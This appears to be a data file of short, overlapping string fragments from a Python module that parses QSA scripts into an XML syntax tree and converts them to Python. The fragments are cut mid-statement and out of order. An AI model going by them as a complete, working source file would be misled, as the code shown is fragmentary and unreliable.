"[\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname",
"def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems",
"if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if",
"options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname = filename + \".py\"",
"nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose:",
"except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass",
"['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) == 1: # if",
"2 - Pythonize and write PY file . . .\") try: execute(options, [arg",
"args = [x for x in args if not os.path.exists(x + \".xml\") or",
"class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn,",
"options, args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist]",
"(%.1f%%) \" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose:",
"if not options.toxml: # Si no se quiere guardar resultado, no hace falta",
"[\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems)",
"return self class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id",
"vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values)",
"promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod",
"class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep",
"self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\",",
"KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn return",
"dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\") (options, args) = parser.parse_args(argv)",
". . .\") options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\")",
"UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata)",
"xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls)",
"# if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0]",
". . . . (%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0)",
"\"'\") if vtype == \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype",
"(repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname =",
"se pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos",
"def __init__(self, name, path): self.name = name self.path = path def loadModule(self): fp",
". .\") try: execute(options, [arg + \".xml\" for arg in args]) except Exception:",
"['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname",
"True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags",
"and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\"",
"(nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\",",
"\".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__ == \"__main__\": main()",
"polish(self): if len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant):",
"try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\" %",
"listobj): return self.__class__ in listobj or self.astname in listobj def get(self, listobj, default=None):",
"if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in",
"callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class",
"def loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE) # description",
"tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"]",
"tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class",
"[\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject):",
"File: %-35s . . . . (%.1f%%) \\r\" % (bname, 100.0 * (nf",
"= [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def",
"(prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no se quiere guardar resultado,",
"= \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype =",
"'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is",
"[filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full:",
"promote_child_if_alone = True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other =",
"= parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname",
"= \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"]",
"else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source =",
"+ 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read()",
"tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"]",
"args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args",
"= str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value =",
"or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename",
"filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s:",
"args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import",
"%s\" % name) continue mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando",
"not tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue ast =",
"tags = [] set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags",
"name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem",
"self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\"",
"getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype,",
"filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname +",
"listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem):",
"print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\",",
"callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags =",
"v) i += 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) #",
"os.path.join(options.storepath, bname + \".xml\") else: destname = filename + \".xml\" f1 = open(destname,",
"= \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType]",
"# adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) ==",
"print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname =",
"execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist,",
"print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] >",
"def is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj def get(self,",
"InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other",
"in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: #",
"vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems) == 1: #",
"def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class Function(ListNamedObject):",
"True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags",
"execute(options, args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python =",
"def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn",
"self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\",",
"= 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def",
"% argn, vtype + \":\" + repr(value)) def add_other(self, argn, vtype, data): if",
"del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__",
"python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\")",
"if options.full: execpython = options.exec_python options.exec_python = False options.full = False options.toxml =",
"parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False,",
"analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname +",
"in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return",
"print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 -",
"continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%) \\r\"",
"% argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems)",
"\"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject):",
"ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags =",
"help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists,",
"class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list',",
"if options.verbose: print(\"Pass 1 - Parse and write XML file . . .\")",
"\"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return",
"\"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo",
"return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags",
"debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags =",
"try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e:",
"class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags =",
"class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True",
"[\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags",
"tags = [\"constant\"] def add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\")",
"\"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type =",
"is None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def",
"- Pythonize and write PY file . . .\") try: execute(options, [arg +",
"= [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"]",
"argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype",
"k, v in treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i,",
"def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj or",
"encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . .",
"os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" %",
"self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and",
"== \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value)",
"%s\" % name) elif options.topython: from .pytnyzer import pythonize import io if options.cache:",
"True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args):",
"else: destname = filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close()",
"+ (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args = [x for x",
"main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([])",
"stream try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\"",
"Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname =",
"0: self.astname = \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags",
"+ 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO()",
"= parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name,",
"{} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] =",
"e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo",
"ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename in args:",
"if not prog: print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename))) continue",
"Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print(\"Pass",
"builtins import object from optparse import OptionParser import os import os.path import sys",
"= flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo abrir fichero %-35s",
"io if options.cache: args = [x for x in args if not os.path.exists((x",
"arg in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python:",
"\"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value =",
"/ nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout =",
"argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone:",
"value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\" value",
"from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\",",
"from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS =",
"# self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem",
"* (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename,",
"if len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if",
"= os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%)",
"100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout",
"1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"]",
"add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags",
"= ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class",
"[\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone =",
"None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj",
"[] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self,",
"options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename,",
"DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression']",
"self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj",
"subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in",
"import imp import traceback from lxml import etree try: from pineboolib.flparser import flscriptparse",
"class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True",
"polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return self class DictObject(ListObject): tags",
"+= 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys()",
"str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value = value[1:-1]",
"add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if",
"no encontrado\" % self.name) result = False except Exception as e: print(traceback.format_exc()) result",
"parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False,",
"[\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname))",
"fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\",",
"= [\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other",
"and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag",
"class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname",
"- Test PY file load . . .\") options.topython = False try: execute(",
"try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS",
"= ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return",
"\"FCONST\": vtype = \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\",",
"vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype",
"def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn,",
"debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone",
"adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is",
"subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem)",
"= [x for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or",
"\\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error:",
"file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\",",
"('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name)",
"len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return",
"False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False",
"self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class",
"print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if",
"os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for",
"= [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone",
"execpython = options.exec_python options.exec_python = False options.full = False options.toxml = True if",
"file . . .\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml",
"options.exec_python = False options.full = False options.toxml = True if options.verbose: print(\"Pass 1",
"old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s: \" % bname +",
"self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and",
"No se pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog =",
"hace falta calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0)",
"self.__class__ in listobj or self.astname in listobj def get(self, listobj, default=None): if self.__class__",
"= \"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\":",
"options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in",
"source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self,",
"options.exec_python: # import qsatype for filename in args: realpath = os.path.realpath(filename) path, name",
"XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\")",
"tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one",
"class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags",
"vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if",
"help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python",
". . . (%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0) /",
"False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname",
"action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML",
"options.cache: args = [x for x in args if not os.path.exists(x + \".xml\")",
"class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression']",
"subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback =",
"= vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self,",
"set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname):",
"= [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class",
"False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except",
"from builtins import object from optparse import OptionParser import os import os.path import",
"messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False,",
"- Parse and write XML file . . .\") try: execute(options, args) except",
"dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags =",
"if vtype == \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type = vtype",
"Exception: print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data:",
"= None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a",
"== \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self",
"def add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype ==",
"tags = [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return",
"= False options.full = False options.toxml = True if options.verbose: print(\"Pass 1 -",
"promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname):",
"in listobj def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if",
"args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs",
"def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in",
"stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints",
"KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname,",
"[\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject):",
"subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if",
"if self.xmlname is None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags =",
"default=False, help=\"If dest file exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return",
"== 0 and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn",
"= KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\"",
"class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname): return",
"args) if options.full: execpython = options.exec_python options.exec_python = False options.full = False options.toxml",
"str from builtins import object from optparse import OptionParser import os import os.path",
"action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write",
"cls break if classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata):",
"(options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options,",
"+ \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args): bname =",
"if not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython: from .pytnyzer",
"class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags",
"tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"]",
"= [\"updateoperator\"] # ----- keep this one at the end. class Unknown(TagObject): promote_child_if_alone",
"== 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags =",
"= [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class",
"class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if",
"xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn",
"class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"]",
"\".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf,",
"keep this one at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn =",
